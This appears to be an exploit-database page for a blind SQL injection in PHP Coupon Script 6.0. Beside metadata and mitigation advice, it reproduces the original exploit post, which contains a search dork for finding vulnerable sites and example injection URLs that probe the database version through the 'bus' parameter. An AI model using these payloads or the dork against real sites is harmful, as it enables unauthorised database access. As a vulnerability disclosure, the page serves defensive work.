header-logo
Suggest Exploit
vendor:
PHP Coupon Script
by:
BorN To K!LL - h4ck3r
8.8
CVSS
HIGH
Blind-Injection
89
CWE
Product Name: PHP Coupon Script
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: N/A
CPE: a:couponscript:php_coupon_script:6.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PHP Coupon Script

The vulnerability exists in the 'index.php' page of the PHP Coupon Script version 6.0, which allows an attacker to inject malicious SQL queries via the 'bus' parameter. An attacker can use the substring() function to check the version of the database and inject malicious SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use parameterized queries.
Source

Exploit-DB raw data:

==
[|]Script: PHP Coupon Script
[|]Version: 6.0
[|]Dork: "PHP Coupon Script v. 6.0"
[|]Link: http://www.couponscript.com
==
[|]Author: BorN To K!LL - h4ck3r
[|]Contact: SQL@hotmail.co.uk
==
[|]3xploit:
/index.php?page=viewbus&bus=[Blind-Injection]

[|]3xample:
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=4                       // false ,,
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=5                       // true ,,

==
[|]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==